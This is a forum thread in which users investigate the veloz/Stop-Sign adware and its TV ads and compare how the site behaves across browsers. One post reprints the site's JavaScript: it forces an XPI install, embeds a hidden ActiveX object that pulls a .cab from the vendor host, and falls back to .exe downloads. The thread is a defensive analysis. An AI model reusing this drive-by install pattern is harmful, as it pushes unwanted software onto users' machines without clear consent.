 dadkinsCan you do Blu?Premium,MVM join:2003-09-26 Hercules, CA kudos:18 1 edit | reply to novaflare
Re: veloz scumware seen on comercial just now Ok, I just went there in Internet Explorer, still nothing. Clicked all links and buttons...nada. |
|
 NetFixerFreedom is NOT freePremium join:2004-06-24 The 'Boro Reviews:
·Vonage
·Cingular Wireless
·Comcast
·AT&T Southeast
| reply to novaflare
 IE 6 SP1 |
Apparently veloz.com modifies the web page delivered by the browser in use and probably other factors.
Here is a screen shot of the veloz.com entry page from IE 6 SP1 on my Windows 2K workstation. |
|
 NetFixerFreedom is NOT freePremium join:2004-06-24 The 'Boro Reviews:
·Vonage
·Cingular Wireless
·Comcast
·AT&T Southeast
| reply to novaflare
 NS 7.1 |
Here is a screen shot of the veloz.com entry page from Netscape 7.1 on the same Windows 2000 workstation. Both pages are different from others shown in this forum thread. |
|
|
|
 viperpa33sWhy Me?Premium join:2002-12-20 Bradenton, FL | reply to novaflare said by sig: Yeah, I recall there was a connection between veloz and eacceleration. I recently saw an ad for Stop Sign on cable and my jaw dropped (although they'd reportedly been advertising on TV I'd never seen one before).
There is a connection cause they are both the same company. They also host an online game called The 4th Coming. I had the Trojan awhile back for the same thing but it was already on my computer.
When you use the installer from the site, it contains the Trojan, Wrench C. I use to have Avast and it didn't pick it up. When I switched to AVG, it picked up the Trojan and removed it quite easily. |
|
 1 edit | reply to novaflare I get nothing no matter what I click with IE 6. I have Spybot, Spywareblaster, and popupcompanion installed though also. |
|
 IGGYNo Guru Just Here To HelpPremium,MVM join:2001-03-30 Chatham, IL 4 edits | reply to dadkins
Interesting to see this is the same company trying to market it's crap under 2 different names. XP SP2 stops the Active X on the eAcceleration's Stop-Sign Anti-Virus product page from installing.
"May I ask, what channel had this commercial?"
I mentioned this in several other threads. TechTV now G4Techtv had there ads on during The Screensavers and the old Call For Help show. G4TechTV currently does the Veloz commercial during The ScreenSavers still.
My post here covers the previous commercials I saw.
»eanthology,stop-sign,veloz do i need to be scared
Why do some people call Stop-Sign spyware?
»tinyurl.com/6oxu4 ( this link takes you to there site and there explanation ). |
|
 Luka1 join:2001-10-30 Index, WA | reply to novaflare Could you save the page source for that page and post it here in a zip file ?
Maybe someone will be able to figure out exactly what is being triggered, and how. |
|
 bcoolPremium join:2000-08-25 The Ozarks | reply to novaflare said by novaflare:
Fox news network
fair and balanced my ...;) well, anyway, I've set *.exe handling in Firefox so that executables are never ever downloaded automatically. FWIW, I'm always prompted. -- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040710 Firefox/0.9.0+ (stipe) Aviary Branch |
|
 novaflareThe Dragon Was HerePremium join:2002-01-24 Barberton, OH | reply to Luka1 said by Luka1: Could you save the page source for that page and post it here in a zip file ?
Maybe someone will be able to figure out exactly what is being triggered, and how.
ill just use the code tag to prevent it from actng as html and java and will break the script tag just to be safe. -- new 3d chat comunity at »planetvirtuel.com my site »spellbound.valshea.com/news.php |
|
 novaflareThe Dragon Was HerePremium join:2002-01-24 Barberton, OH | reply to novaflare Im also placeing 2 lines in bold one is a xpi isnt this a firefox ext for firefox/firebird plugins? the exe shows up 3 times in the code The urls below have been broken on purpose useing ? for 0 , for . and ; for : to prevent accidental clicking http;//defender.vel?z,c?m/pub/download/eanthology.xpi and the standard exe apears http;//www,st?p-sign,c?m/pub/downl?ad/veloz_vlz.exe
script language="javascript" type="text/javascript"><!--
var isIe = document.all;
var ua = navigator.userAgent.toLowerCase();
function xpi_install(title) { if (ua.indexOf('gecko') != -1) { var xpi = new Object(); xpi["Stop-Sign"] = "http://defender.veloz.com/pub/download/eanthology.xpi?%3Fpg%3D *vlz_redir%2526se_vlz_spin%2526vlz_005%2526ss_dc001%26ver%3Donline%26rbs%3D24253c06%26cv%3D *unk%26n%3Dd_veloz_clk01%26dc%3D1%26SV%3Dvlz_005%26instname%3Dstopsign"; InstallTrigger.install(xpi, xpi_retval); } else { setTimeout('location.href = "http://www.stop-sign.com/pub/download/veloz_vlz.exe"' *, 1000); } }
function xpi_retval(file_path, result) { switch (result) { case 999: // FALL THROUGH setTimeout('location.href = "http://www.stop-sign.com/pub/download/veloz_vlz.e *xe"', 1000); break; case 0: // SUCCESS break; case -210: // CANCELLED setTimeout('location.href = "http://www.stop-sign.com/pub/download/veloz_vlz.e *xe"', 1000); break; default: // AN ERROR HAS OCCURED setTimeout('location.href = "http://www.stop-sign.com/pub/download/veloz_vlz.e *xe"', 1000); } }
if (isIe) { document.write('<object classid="CLSID:2119776A-F1AD-4FCD-9548-F1E1C615350C" id="hoo" *name="hoo" width="1" height="1" style="left: 0px; top: 0px; visibility: hidden;" codebase= *"http://www.stop-sign.com/pub/download/veloz_vlz.cab#Version=1,0,1,66"></object>'); } else { xpi_install(); } //--></script
(*) WARNING 6 long line(s) split
-- new 3d chat comunity at »planetvirtuel.com my site »spellbound.valshea.com/news.php |
|
 novaflareThe Dragon Was HerePremium join:2002-01-24 Barberton, OH | reply to novaflare I wonder what this xpi file is could this be some atempt at a moz firebir/firefox high jacking? The above code apears on the redirect from the veloz web site on stopsings website. -- new 3d chat comunity at »planetvirtuel.com my site »spellbound.valshea.com/news.php |
|
 bcoolPremium join:2000-08-25 The Ozarks | So far, at least on my current Firefox, none of this can occur automatically without user intervention. To be safe though, I've also disabled Allow Web sites to install software in Options. I can always enable it for a legitimate Mozilla extension/theme installation. |
|
 novaflareThe Dragon Was HerePremium join:2002-01-24 Barberton, OH | said by bcool: So far, at least on my current Firefox, none of this can occur automatically without user intervention. To be safe though, I've also disabled Allow Web sites to install software in Options. I can always enable it for a legitimate Mozilla extension/theme installation.
mine just prompts me to install or not and to say or open any ext .exe .zip rar etc only .txt opens auto. -- new 3d chat comunity at »planetvirtuel.com my site »spellbound.valshea.com/news.php |
|
 chia join:2003-12-20 Fort Lauderdale, FL | reply to novaflare I've seen this commercial, thought it was odd to see an ad for a security product on the tele (especially one i've never heard of).
Panda doesn't pick up anything on this, neither does ewido, a², or Trend (online scan). Submitted it since a couple other products mentioned here didnt pick it up either.
Sad thing is this ad was aimed at those without protection already. |
|
 novaflareThe Dragon Was HerePremium join:2002-01-24 Barberton, OH | said by chia: I've seen this commercial, thought it was odd to see an ad for a security product on the tele (especially one i've never heard of).
Panda doesn't pick up anything on this, neither does ewido, a², or Trend (online scan). Submitted it since a couple other products mentioned here didnt pick it up either.
Sad thing is this ad was aimed at those without protection already.
I doubt eanthology and stop sign will get added to av programs its not a virus or trojan. I had it installed on my os purposefully do to fact i happened to like t4c and my fav server started useing it as its launcher. -- new 3d chat comunity at »planetvirtuel.com my site »spellbound.valshea.com/news.php |
|
 | My Hosts file completely blocks the domains relating to this.  |
|
 | reply to Snowy said by Snowy: I just tried too in IE, must be either SpywareBlaster or a hostfile stopping the DL. Maybe something nice to be said for IE. Firefox would have let it thru if not for NOD32
I use Firefox and I got no upload attempts from that page. I do have Proxomitron running, and have some serious JS filters in there, however. |
|
 sigPremium join:2001-05-05 | reply to novaflare Symantec added eAnthology it to its database some time ago (during one of our previous eAanthology/Stop Sign threads).
Look for Adware.eAnthology at the bottom section of this Symantec virus encyclopedia page: »securityresponse.symantec.com/av···exA.html
As for this specific apparent exploit mechanism I don't know, but the word has been out on eacceleration/eanthology/stop sign for some time now. And various products do detect it, although most AV's may not but it appears that NAV should. |
|
 KiwiPremium join:2003-05-26 USA/MidWest kudos:1 Reviews:
·Comcast
| reply to novaflare HUmm, nothing here -Ok, I'm using IE, but do have ActiveX & Java turned off and the only time Java is switched on, is for the speed run here; though I know it's been patched. Now, this looks like a Java exploit. -- 2.66g/533fsb Intel CPU @ 3.28g 512meg Twinmos PC3700~466 DDR @ 2.8v ATI 9500 Pro @ 9700 Pro@1.6vAMD ASUS A7N8X-E2500+@3200 ATI 9500 Pro, Corsair 512LL. |
|
 IGGYNo Guru Just Here To HelpPremium,MVM join:2001-03-30 Chatham, IL | reply to IGGY Just watched an ESPN program on our DVR from the other night tonight. And guess what I saw?:D A commercial for eanthology stop-sign. These people are infecting our airwaves. |
|